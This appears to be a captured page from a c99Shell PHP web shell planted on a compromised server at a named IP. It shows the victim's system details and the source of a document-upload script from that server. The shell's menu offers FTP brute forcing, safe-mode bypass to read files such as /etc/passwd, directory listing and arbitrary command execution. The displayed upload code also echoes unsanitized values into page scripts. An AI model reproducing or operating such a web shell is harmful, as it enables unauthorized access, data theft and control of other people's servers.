110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mistk/eoffice/admin/ drwxr-xr-x Free 50.92 GB of 127.8 GB (39.84%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?PHP
include_once("../../class/clsConnection.php");
include_once("../../class/clsDB.php");
include_once "../global.php";
include_once "../class/clsSysConfig.php";
include_once "../class/clsDocattatches.php";
include_once "../class/clsDocattatchesTmp.php";
include_once "../class/clsSendReceive.php";


$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oSys = new sysConfig($oC);
$oDatt = new Docattatches($oC);
$oDatt2 = new Docattatches($oC);
$oDatt3 = new Docattatches($oC);
$oDatt1 = new Docattatches($oC);
$oDtmp = new DocattatchesTmp($oC);
$oTsr = new sendreceive($oC);
$oTsre = new sendreceive($oC);

if($method2!='del'){ echo 'not del';
        //----------add DocAttatches 
            $file = $_FILES['fileupload']['name'];
            $sizefile = $_FILES['fileupload']['size']; 
            $filetype=strstr($file,'.');
            $str = $file;    
            $len=strlen($str);
            $count=0;  
            for($i=0; $i<$len; $i++){  
                //echo $str{$i}."<br>"; 
                $asci=ord($str{$i});
                if($asci == 46){
                    $count++;
                } 
                if($asci == 44){

                    $count++;
                }
            }
            $oSys->RSsysConfig();
            $oSys->GetRecord();
            $oSys->filesizebyte;
            $sizefileM=($oSys->filesizebyte/1024/1024);
            if($count>1){
                        ?>
                        <? include("uploadDocSended.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='no';
                            var caseerror="ЄЧиНбїйБдБи¤ЗГЁР»ГРЎНєґйЗВ ЁШґ(.) бЕР , ЎГШіТа»ЕХиВ№ЄЧиНбїйБ";
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a; ?>');
                        </script>  
                        <?
            }else if($sizefile>$oSys->filesizebyte || $sizefile==0){  //---- 2 MB , 2048 KB
                        ?>
                        <? include("uploadDocSended.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='no';
                            var caseerror='ў№ТґбїйБµйН§дБиаЎФ№ <?  echo $sizefileM; ?> MB';
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a; ?>');
                        </script>  
<?    
            }else if($filetype!='.doc' && $filetype!='.xls' && $filetype!='.ppt' && $filetype!='.zip' && $filetype!='.rar' && $filetype!='.odt' && $filetype!='.ods' && $filetype!='.odp' && $filetype!='.pdf' && $filetype!='.jpg' && $filetype!='.gif' && $filetype!='.jpeg' && $filetype!='.png' && $filetype!='.DOC' && $filetype!='.XLS' && $filetype!='.PPT' && $filetype!='.ZIP' && $filetype!='.RAR' && $filetype!='.ODT' && $filetype!='.ODS' && $filetype!='.ODP' && $filetype!='.PDF' && $filetype!='.JPG' && $filetype!='.GIF' && $filetype!='.JPEG' && $filetype!='.PNG'){              
?>
                        <? include("uploadDocSended.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='no';
                            var caseerror="дБиКТБТГ¶НСѕвЛЕґбїйБ№ТБКЎШЕ <? echo $filetype; ?> дґй";
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a; ?>');
                        </script>  
<?                    
            }else{
                        $timedoc=date('Ymd_His');
                        $typefile = $_FILES['fileupload']['type']; 
                        $sizefile = $_FILES['fileupload']['size']; 
                        list($aa, $dot) = preg_split("/\./", $file);
                        $filenamemd5=md5($file);
                        $tempfile = $GLOBALS['path_upload_documents'].$timedoc."-".$DlcID."-".$filenamemd5.".".$dot;
                    
                        copy($_FILES['fileupload']['tmp_name'],$tempfile);
                        
                                //----search DaSeq of DocID
                                //$MaxDaSeq=$oDatt1->SearchMaxDaSeqDocID($DocID);
                            
                                $oDatt->AddNew();
                                $oDatt->DaID=$oDatt->GetNextCode();
                                $oDatt->DocID=$DocID;
                                $oDatt->DaFileName=$_FILES['fileupload']['name'];
                                $oDatt->DaUpFileName=$timedoc."-".$DlcID."-".$filenamemd5.".".$dot;
                                $oDatt->DaAddNewSended='Y';
                                $oDatt->Save();

                        $oTsr->SearchBytsr_docid($DocID);
                        while($oTsr->GetRecord()){ 
                                $chksum_doc='';
                                $oTsr->Edit();
                                $oTsr->tsr_doc_url=$oTsr->tsr_doc_url.$docpath.$oDatt->DaUpFileName.',';
                                $chksum_doc=md5_file($docpath.$oDatt->DaUpFileName).',';
                                $oTsr->tsr_doc_chksum=$oTsr->tsr_doc_chksum.$chksum_doc;
                                $oTsr->tsr_docname=$oTsr->tsr_docname.$oDatt->DaFileName.',';
                                $oTsr->tsr_statusDocAtt=$oTsr->tsr_statusDocAtt.'N';
                                $oTsr->tsr_CountDoc=$oTsr->tsr_CountDoc+1;
                                $oTsr->Save();
                        }
?>
                        <? include("uploadDocSended.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='yes';
                            var caseerror='НСѕвЛЕґдїЕмКУаГзЁ !';
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a; ?>');
                        </script>  
<?    

            }
}else if($method2=='del'){
                        $oDatt->SearchByKey($selectdel);
                        $oDatt->GetRecord();
                        unlink($GLOBALS['path_upload_documents'].$oDatt->DaUpFileName);
                        $oDatt->Delete();

                        ?>
                        <? include("uploadDocSended.php");?>
                        <? $a=manageDocAtt($DlcID,$DocID);?>
                        <script language="javascript" type="text/javascript">
                            var myresult='yes';
                            var caseerror='';
                            window.top.document.getElementById('method2').value="";
                            window.top.window.stopUpload(myresult,caseerror,'<? echo $a; ?>');
                            
                        </script>  
<?
}
?>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: